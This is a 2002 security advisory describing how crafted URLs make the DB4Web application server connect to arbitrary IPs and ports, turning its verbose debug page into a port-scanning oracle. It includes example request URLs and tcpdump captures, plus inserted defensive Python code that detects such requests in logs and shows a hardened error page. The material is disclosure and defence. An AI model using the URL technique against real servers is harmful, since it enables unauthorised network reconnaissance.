[NEWS] DB4Web (R) TCP Connects to Arbitrary IP and Port

From: support@securiteam.com
Date: 09/22/02


From: support@securiteam.com
To: list@securiteam.com
Date: Sun, 22 Sep 2002 12:58:58 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  DB4Web (R) TCP Connects to Arbitrary IP and Port
------------------------------------------------------------------------

SUMMARY

DB4Web (R) is an application server for high-performance, secure web
applications with access to various data sources. The DB4Web (R)
application can be misused to send TCP SYN packets (initiate TCP
connections) to arbitrary IP addresses and TCP ports by sending specially
crafted HTTP requests.

DETAILS

Vulnerable systems:
 * DB4Web (R) Application Server

A DB4Web (R) server accessed with a web browser usually queries local or
remote databases to generate dynamic HTML pages. By requesting malicious
URLs, one can make the server query an arbitrary IP address with a freely
definable port. The application will send TCP SYN packets to establish a
connection. The error messages for successful and unsuccessful TCP
connections differ. Thus, it is possible to port-scan/fingerprint IPs
reachable from the DB4Web (R) server.

Example:
The scenario was tested with a system running SuSE Linux 7.3 that includes
a trial version of DB4Web (R) and a Linux system running tcpdump.

On the DB4Web (R) server (172.31.93.158) the URL
http://127.0.0.1/DB4Web/172.31.93.30:22/foo

is requested with Mozilla (web browser). 172.31.93.30 is the IP of the
system running tcpdump, with port 22 open (SSHd). Tcpdump reports the 3-way
handshake and the subsequent reset, caused by the server speaking the wrong
protocol to the listener (which runs SSHd on port 22).

Tcpdump's output looks like this:
17:25:13.671550 172.31.93.158.1449 > 172.31.93.30.22: S
266670866:266670866(0) win 5840 <mss 1460,sackOK,timestamp 1232639
0,nop,wscale 0> (DF)

17:25:13.671663 172.31.93.30.22 > 172.31.93.158.1449: S
279647520:279647520(0) ack 266670867 win 5792 <mss 1460,sackOK,timestamp
11683562 1232639,nop,wscale 0> (DF)

17:25:13.674917 172.31.93.158.1449 > 172.31.93.30.22: . ack 1 win 5840
<nop,nop,timestamp 1232639 11683562> (DF)

17:25:13.678327 172.31.93.30.22 > 172.31.93.158.1449: P 1:23(22) ack 1 win
5792 <nop,nop,timestamp 11683563 1232639> (DF)

17:25:13.680997 172.31.93.158.1449 > 172.31.93.30.22: . ack 23 win 5840
<nop,nop,timestamp 1232640 11683563> (DF)

17:25:13.684046 172.31.93.158.1449 > 172.31.93.30.22: P 1:961(960) ack 23
win 5840 <nop,nop,timestamp 1232640 11683563> (DF)

17:25:13.686428 172.31.93.30.22 > 172.31.93.158.1449: . ack 961 win 8640
<nop,nop,timestamp 11683564 1232640> (DF)

17:25:13.688520 172.31.93.30.22 > 172.31.93.158.1449: P 23:42(19) ack 961
win 8640 <nop,nop,timestamp 11683564 1232640> (DF)

17:25:13.690469 172.31.93.30.22 > 172.31.93.158.1449: R 42:42(0) ack 961
win 8640 <nop,nop,timestamp 11683564 1232640> (DF)

The browser shows a lot of debug output reported by DB4Web (R), in
particular the line:
connect() ok
And a few lines later:
callmethodbinary_2 failed

A URL like
http://127.0.0.1/DB4Web/172.31.93.30:555/foo
requests TCP port 555, which is closed on the listening system.

Tcpdump reports three connection attempts:
17:38:59.965559 172.31.93.158.1451 > 172.31.93.30.555: S
1127433463:1127433463(0) win 5840 <mss 1460,sackOK,timestamp 1314829
0,nop,wscale 0> (DF)

17:38:59.965654 172.31.93.30.555 > 172.31.93.158.1451: R 0:0(0) ack
1127433464 win 0 (DF)

17:39:00.991971 172.31.93.158.1452 > 172.31.93.30.555: S
1127433466:1127433466(0) win 5840 <mss 1460,sackOK,timestamp 1314930
0,nop,wscale 0> (DF)

17:39:00.992066 172.31.93.30.555 > 172.31.93.158.1452: R 0:0(0) ack
1127433467 win 0 (DF)

17:39:02.012012 172.31.93.158.1453 > 172.31.93.30.555: S
1127433469:1127433469(0) win 5840 <mss 1460,sackOK,timestamp 1315031
0,nop,wscale 0> (DF)

17:39:02.012107 172.31.93.30.555 > 172.31.93.158.1453: R 0:0(0) ack
1127433470 win 0 (DF)

The debug message is different now and contains:
connect() failed: Connection refused
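
Because the two debug texts above ("connect() ok" versus "connect() failed: Connection refused") make the DB4Web (R) server usable as a port scanner, a defender's first question is whether anyone is already driving it that way. The following script is an added example, not part of the advisory and not DB4Web (R) code: it parses web-server access-log lines in Common Log Format, extracts the host:port target from request paths of the form /DB4Web/<host>:<port>/... shown in the advisory, and flags both requests to targets outside an assumed allow-list and source addresses that request many distinct ports (a sweep). The log lines, the allow-listed backend dbhost.example:5432 and the threshold of four ports are constructed for the example.

```python
import re
from collections import defaultdict

# Constructed sample access-log lines (Common Log Format); not taken from the
# advisory. The request paths use the /DB4Web/<host>:<port>/... form the
# advisory describes.
SAMPLE_LOG = """\
172.31.93.158 - - [22/Sep/2002:17:25:13 +0200] "GET /DB4Web/172.31.93.30:22/foo HTTP/1.0" 200 2311
172.31.93.158 - - [22/Sep/2002:17:38:59 +0200] "GET /DB4Web/172.31.93.30:555/foo HTTP/1.0" 200 1870
10.0.0.7 - - [22/Sep/2002:17:40:01 +0200] "GET /DB4Web/172.31.93.30:23/foo HTTP/1.0" 200 1870
10.0.0.7 - - [22/Sep/2002:17:40:02 +0200] "GET /DB4Web/172.31.93.30:25/foo HTTP/1.0" 200 1870
10.0.0.7 - - [22/Sep/2002:17:40:03 +0200] "GET /DB4Web/172.31.93.30:80/foo HTTP/1.0" 200 1870
10.0.0.7 - - [22/Sep/2002:17:40:04 +0200] "GET /DB4Web/172.31.93.30:443/foo HTTP/1.0" 200 1870
10.0.0.7 - - [22/Sep/2002:17:41:00 +0200] "GET /DB4Web/dbhost.example:5432/report HTTP/1.0" 200 9100
10.0.0.9 - - [22/Sep/2002:17:42:00 +0200] "GET /index.html HTTP/1.0" 200 512
"""

# Assumed allow-list: the only backend this server is supposed to reach
# (hypothetical value, not from the advisory).
ALLOWED_TARGETS = {("dbhost.example", 5432)}

# Common Log Format: source, ident, user, [timestamp], "METHOD path proto", status
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Target embedded in the request path, as in /DB4Web/172.31.93.30:22/foo
TARGET_RE = re.compile(r'^/DB4Web/(?P<host>[^/:]+):(?P<port>\d{1,5})(?:/|$)')


def parse_target(path):
    """Return (host, port) if the path addresses a backend target, else None."""
    m = TARGET_RE.match(path)
    if not m:
        return None
    port = int(m.group("port"))
    if not 0 < port < 65536:      # reject out-of-range port numbers
        return None
    return m.group("host"), port


def analyse(log_text, allowed=ALLOWED_TARGETS, scan_threshold=4):
    """Flag requests whose target is not allow-listed and sources touching many ports.

    Returns (disallowed, scanners): disallowed is a list of (src, host, port)
    in log order; scanners maps a source IP to the sorted distinct ports it
    requested, for sources with at least scan_threshold distinct ports.
    """
    disallowed = []
    ports_by_src = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        target = parse_target(m.group("path"))
        if target is None:
            continue                      # ordinary page, not a backend request
        host, port = target
        ports_by_src[m.group("src")].add(port)
        if target not in allowed:
            disallowed.append((m.group("src"), host, port))
    scanners = {src: sorted(p) for src, p in ports_by_src.items()
                if len(p) >= scan_threshold}
    return disallowed, scanners


if __name__ == "__main__":
    bad, sweeps = analyse(SAMPLE_LOG)
    for src, host, port in bad:
        print(f"disallowed backend target {host}:{port} requested by {src}")
    for src, ports in sweeps.items():
        print(f"possible port sweep from {src}: ports {ports}")
```

On the constructed input the script reports six requests to non-allow-listed targets and one source (10.0.0.7) that requested five distinct ports; the threshold is deliberately low so the sweep is visible in a handful of lines, and should be tuned against the volume of legitimate backend requests on a real server.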

Vendor Response:
The DB4Web team does not classify this behavior as a security-related bug.
They consider the verbose debug messages a feature useful for developers.
The DB4Web team states that it is the customer's responsibility to
replace the debug page with a custom error page.

Solution:
Replace the debug page with a non-verbose error page.
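
To make concrete why the non-verbose error page matters, here is an added example (not from the advisory and not DB4Web (R) code) that contrasts the behaviour the advisory describes with a hardened variant. verbose_debug_page reproduces the observable difference between "connect() ok" and "connect() failed: ..." for a real TCP connect(); hardened_page goes one step beyond the page's stated solution by also refusing targets that are not on an assumed backend allow-list, and it returns one fixed GENERIC_ERROR text for every failure, so a client can no longer tell a refused port from a disallowed one. The allow-list contents and the GENERIC_ERROR wording are assumptions; demo() exercises both functions against a throwaway listener on 127.0.0.1 so the example runs offline.

```python
import socket

# Assumed allow-list of backends this server may contact (hypothetical values;
# the advisory does not describe DB4Web's real configuration format).
ALLOWED_BACKENDS = {("127.0.0.1", 5432)}

# One fixed text for every failure, so the response no longer reveals whether
# connect() to the requested host:port succeeded.
GENERIC_ERROR = "The requested resource is temporarily unavailable."


def verbose_debug_page(host, port, timeout=2.0):
    """Behaviour the advisory describes: the debug page tells the client
    whether the TCP connect() to the requested target worked."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return "connect() ok\n...\ncallmethodbinary_2 failed"
    except OSError as exc:
        return "connect() failed: %s" % (exc.strerror or exc)


def hardened_page(host, port, allowed=ALLOWED_BACKENDS, timeout=2.0):
    """Hardened variant: only allow-listed backends are contacted at all, and
    every failure (disallowed target, refused, timed out) yields the same
    GENERIC_ERROR text. Returns "ok" when the backend was reachable."""
    if (host, port) not in allowed:
        return GENERIC_ERROR          # no connect() attempted for foreign targets
    try:
        with socket.create_connection((host, port), timeout=timeout):
            # A real server would now talk to its database; the advisory does
            # not document that protocol, so the example stops after connect().
            return "ok"
    except OSError:
        # Log the detail server-side if needed; never echo it to the client.
        return GENERIC_ERROR


def demo():
    """Self-contained demonstration on a throwaway local listener."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))   # ephemeral port, open while listening
    listener.listen(1)
    port = listener.getsockname()[1]
    allowed = {("127.0.0.1", port)}
    results = {
        "verbose_open": verbose_debug_page("127.0.0.1", port),
        "hardened_open": hardened_page("127.0.0.1", port, allowed),
        "hardened_disallowed": hardened_page("127.0.0.1", port, set()),
    }
    listener.close()                  # port is now closed: connect() is refused
    results["verbose_closed"] = verbose_debug_page("127.0.0.1", port)
    results["hardened_closed"] = hardened_page("127.0.0.1", port, allowed)
    return results


if __name__ == "__main__":
    for name, text in demo().items():
        print(f"{name}: {text.splitlines()[0]}")
```

The verbose page answers differently for the open and the closed port, which is exactly the oracle the advisory describes; the hardened page answers identically for the closed port and for a target that was never contacted, and only the allow-listed, reachable backend gets a non-error result.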

Vendor Communication:
08/29/02 Initial Notification via email to support@db4web.de, cc:
Juergen.Kettlitz@siemens.com
08/30/02 Got vendor receipt via phone
09/02/02 Phone call by vendor regarding details
09/09/02 Second email to vendor asking for patch status information
09/16/02 Phone call and email from vendor; no classification as security flaw

ADDITIONAL INFORMATION

The information has been provided by
<mailto:stefan.bagdohn@guardeonic.com> Stefan Bagdohn.
